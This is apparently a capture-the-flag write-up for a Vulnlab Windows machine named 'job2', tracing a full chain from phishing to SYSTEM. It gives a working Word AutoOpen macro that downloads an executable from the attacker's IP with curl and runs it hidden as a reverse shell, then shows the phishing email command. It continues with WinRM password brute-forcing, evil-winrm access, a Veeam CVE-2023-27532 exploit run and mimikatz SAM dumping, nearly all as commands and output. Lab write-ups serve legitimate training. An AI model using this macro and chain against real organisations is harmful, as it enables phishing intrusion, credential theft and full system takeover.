job2 a hard windows machine , from phising to admin
Preperation
1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension since it won’t allow for embedded macros. Either use .doc or .docm
Do the testing on your lan 1st ( a kali box and a windows11 pc )
i used this macro
Sub AutoOpen()
a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)
End Sub
Open the puck3.docm 2 times, 1st to download rcat, and 2nd time to execute rcat.exe
If you receive a reverse shell , start the job2 box , to get the job2
Here we go …
We start with a nmap scan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining) Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining) Nmap scan report for job2.vl (10.10.122.114) Host is up (0.019s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 a39477ca160eecfb238667c60ae3ca7b (RSA) | 256 0e2a317094995d95d4f840d5b5368e88 (ECDSA) |_ 256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519) 25/tcp open smtp hMailServer smtpd | smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 111/tcp open rpcbind 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=www.job2.vl | Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl | Not valid before: 2023-05-09T13:31:40 |_Not valid after: 2122-05-09T13:41:37 |_http-title: Not Found 445/tcp open microsoft-ds? 1063/tcp open rpcbind 2049/tcp open rpcbind 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=JOB2 | Not valid before: 2024-07-10T08:57:44 |_Not valid after: 2025-01-09T08:57:44 Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb2-time: | date: 2024-07-11T08:59:22 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds
We examine a website, and find out how to apply for the job2
Send your CV 2 times ( of course 1st modify your test ip on lan to your tun0 ip of the vulnhub vpn. in the macro of puck3.docm
┌──(puck㉿kali)-[~/vulnlab/job2] └─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!
Catch the shell
┌──(puck㉿kali)-[~/vulnlab/job2] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -
┌──(puck㉿kali)-[~/vulnlab/job2] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302 Microsoft Windows [Version 10.0.20348.1668] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled C:\Windows\system32>whoami job2\julian C:\Windows\system32>net users User accounts for \\JOB2 ------------------------------------------------------------------------------- Administrator DefaultAccount Ferdinand Guest Julian svc_veeam WDAGUtilityAccount The command completed successfully. C:\Windows\system32>
Next I did a brute-force
┌──(puck㉿kali)-[~/vulnlab/job2] └─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt SMB 10.10.122.114 5985 JOB2 [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2) HTTP 10.10.122.114 5985 JOB2 [*] http://10.10.122.114:5985/wsman WINRM 10.10.122.114 5985 JOB2 [-] JOB2\Ferdinand:123456 WINRM 10.10.122.114 5985 JOB2 [-] JOB2\Ferdinand:12345 WINRM 10.10.122.114 5985 JOB2 [-] JOB2\Ferdinand:123456789 WINRM 10.10.122.114 5985 JOB2 [-] JOB2\Ferdinand:password WINRM 10.10.122.114 5985 JOB2 [-] JOB2\Ferdinand:iloveyou
and it found Ferdinand’s pass
next evil-winrm to the box, and find VEEAM Backup installed
and used CVE-2023-27532-RCE-Only , to finish JOB2
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
TCP 0.0.0.0:9401 0.0.0.0:0 LISTENING 2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents>
.
*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
Data: 573544 bytes of 573544 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
Data: 5925652 bytes of 5925652 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401
and catch the admin shell
┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\users\Administrator\Desktop> dir
dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2023 2:04 PM 1029 LINQPad 5.lnk
-a---- 5/3/2023 4:00 PM 36 root.txt
PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>
That’s all.
Beyond root
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
764 {0;000003e7} 1 D 29290 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;01a2aee9} 3 F 35131903 JOB2\puck S-1-5-21-3935782767-3829597994-1046841959-1004 (14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 37906026 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959
SAMKey : 36c26e0a457c1d613a608d104acca9e9
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 6f2<REDACTED>04a
C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat
powershell \windows\phishsim.ps1
phissim.ps1
Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
$name = $event.SourceEventArgs.FullPath
$changetype = $event.SourceEventArgs.ChangeType
Write-Host "$name was $changetype at $(get-date)"
if(!$name.Contains("~")){
if(Test-Path $name){
Write-Host "Opening $name"
Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
sleep 45
Write-Host "Resetting.."
Get-Process "WINWORD.EXE" | Stop-Process -Force
Get-Process "WINWORD" | Stop-Process -Force
sleep 5
Remove-Item $name -Force
}
}
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action
for(;;){
sleep 45
}